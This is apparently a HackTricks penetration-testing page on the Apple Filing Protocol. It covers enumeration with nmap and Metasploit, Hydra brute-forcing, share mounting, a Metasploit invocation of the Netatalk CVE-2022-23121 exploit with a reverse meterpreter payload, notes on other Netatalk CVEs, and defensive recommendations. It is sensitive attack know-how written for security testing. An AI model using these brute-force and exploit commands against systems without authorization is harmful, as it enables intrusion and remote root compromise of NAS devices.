548 - Pentesting Apple Filing Protocol (AFP)

Tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Basic Information

The Apple Filing Protocol (AFP), once known as AppleTalk Filing Protocol, is a specialized network protocol included within Apple File Service (AFS). It is designed to provide file services for macOS and the classic Mac OS. AFP stands out for supporting Unicode file names, POSIX-style and ACL permissions, resource forks, named extended attributes and sophisticated file-locking mechanisms.

Although AFP has been superseded by SMB in modern macOS releases (SMB is the default since OS X 10.9), it is still encountered in:

  • Legacy macOS / Mac OS 9 environments
  • NAS appliances (QNAP, Synology, Western Digital, TrueNAS…) that embed the open-source Netatalk daemon
  • Mixed-OS networks where Time-Machine-over-AFP is still enabled

Default TCP Port: 548 (AFP over TCP / DSI)

PORT     STATE SERVICE
548/tcp  open  afp

Enumeration

Quick banner / server info

# Metasploit auxiliary
use auxiliary/scanner/afp/afp_server_info
run RHOSTS=<IP>

# Nmap NSE
nmap -p 548 -sV --script "afp-* and not dos" <IP>

Useful AFP NSE scripts:

ScriptWhat it does
afp-lsList available AFP volumes and files
afp-brutePassword brute-force against AFP login
afp-serverinfoDump server name, machine type, AFP version, supported UAMs, etc.
afp-showmountList shares together with their ACLs
afp-path-vulnDetects (and can exploit) directory-traversal, CVE-2010-0533

The NSE brute-force script can be combined with Hydra/Medusa if more control is required:

hydra -L users.txt -P passwords.txt afp://<IP>

If you already have credentials, Nmap’s AFP scripts become much more useful because afp-serverinfo leaks the advertised UAMs (auth methods), while afp-showmount and afp-ls can enumerate reachable shares, ACLs and interesting files:

nmap -p 548 --script afp-serverinfo,afp-showmount,afp-ls \
  --script-args 'afp.username=<USER>,afp.password=<PASS>,ls.maxdepth=2,ls.maxfiles=50' <IP>

Pay attention to:

  • Machine Type: Netatalk in afp-serverinfo output, which usually means a NAS / Unix host rather than Apple’s own AFP implementation.
  • UAMs such as DHX, DHX2, Cleartxt or Guest, because they directly hint at the reachable login paths and whether legacy / weak auth is enabled.
  • Share ACLs from afp-showmount; world-readable or drop-box style shares often expose backups, .appl files, and user metadata before you ever mount the volume.

Interacting with shares

macOS

# Finder → Go → "Connect to Server…"
# or from terminal
mkdir /Volumes/afp
mount_afp afp://USER:[email protected]/SHARE /Volumes/afp

Linux (using afpfs-ng ‑ packaged in most distros)

apt install afpfs-ng
mkdir /mnt/afp
mount_afp afp://USER:[email protected]/SHARE /mnt/afp
# or interactive client
afp_client <IP>

Once mounted, remember that classic Mac resource-forks are stored as hidden ._* AppleDouble files – these often hold interesting metadata that DFIR tools miss.

On Netatalk targets this metadata backend also matters for exploitability:

  • ea = ad means metadata is stored in AppleDouble v2 files / .AppleDouble directories.
  • ea = sys or ea = samba stores metadata in filesystem extended attributes instead.
  • In Netatalk 4.2+ the old appledouble option was removed and the backend is controlled solely through the ea option.

From an offensive perspective, this lets you quickly decide whether AppleDouble-oriented bugs are more likely to be reachable on the server.

Common Vulnerabilities & Exploitation

Netatalk unauthenticated RCE chain (2022)

Several NAS vendors shipped Netatalk ≤3.1.12. A lack of bounds checking in parse_entries() allows an attacker to craft a malicious AppleDouble header and obtain remote root before authentication (CVSS 9.8 – CVE-2022-23121). A full write-up by NCC Group with PoC exploiting Western-Digital PR4100 is available.

Metasploit (>= 6.3) ships the module exploit/linux/netatalk/parse_entries which delivers the payload via DSI WRITE.

use exploit/linux/netatalk/parse_entries
set RHOSTS <IP>
set TARGET 0   # Automatic (Netatalk)
set PAYLOAD linux/x64/meterpreter_reverse_tcp
run

If the target runs an affected QNAP/Synology firmware, successful exploitation yields a shell as root.

Netatalk OpenSession heap overflow (2018)

Older Netatalk (3.0.0 - 3.1.11) is vulnerable to an out-of-bounds write in the DSI OpenSession handler allowing unauthenticated code execution (CVE-2018-1160). A detailed analysis and PoC were published by Tenable Research.

Newer Netatalk attack surface (2022-2024)

Recent Netatalk advisories show that the attack surface is no longer limited to parse_entries() and OpenSession handling:

  • CVE-2022-45188: a specially crafted .appl file can trigger a heap overflow in afp_getappl; this is especially relevant if you can write files into a share and the server runs FCE / notify features.
  • CVE-2023-42464: a type confusion bug in the Spotlight RPC handlers can become reachable when spotlight = yes is enabled in afp.conf (disabled by default).
  • CVE-2024-38439 / CVE-2024-38440 / CVE-2024-38441: one-byte heap out-of-bounds writes in login-related paths fixed in Netatalk 2.4.1 / 3.1.19 / 3.2.1. These bugs are interesting because exploitability depends on the configured UAMs:
    • uams_clrtxt.so + PAM-backed ClearTxt login exposes the FPLoginExt path relevant to CVE-2024-38439.
    • uams_dhx.so + PAM-backed DHX login reaches the vulnerable path for CVE-2024-38440.
    • uams_guest.so keeps the Guest login path reachable for CVE-2024-38441.

This means the output of afp-serverinfo is not just fingerprinting data; it helps you decide which login parser is exposed before spending time on exploit development or NAS firmware triage.

Other notable issues

  • CVE-2022-22995 – Symlink redirection leading to arbitrary file write / RCE when AppleDouble v2 is enabled (3.1.0 - 3.1.17).
  • CVE-2010-0533 – Directory traversal in Apple Mac OS X 10.6 AFP (detected by afp-path-vuln.nse).
  • Multiple memory-safety bugs were fixed again during the 2024 Netatalk releases; if you identify Netatalk in afp-serverinfo, spend a minute correlating the exposed UAMs / Spotlight / metadata backend with the server version before assuming only the 2018/2022 bugs matter.

Defensive Recommendations

  1. Disable AFP unless strictly required – use SMB3 or NFS instead.
  2. If AFP must stay, upgrade Netatalk to ≥ 3.1.18 or 4.x, or apply vendor firmware that back-ports the 2022/2023/2024 patches.
  3. Enforce Strong UAMs (e.g. DHX2), disable clear-text and guest logins.
  4. Restrict TCP 548 to trusted subnets and wrap AFP inside a VPN when exposed remotely.
  5. Periodically scan with nmap -p 548 --script afp-* in CI/CD to catch rogue / downgraded appliances.

Brute-Force

References

Tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks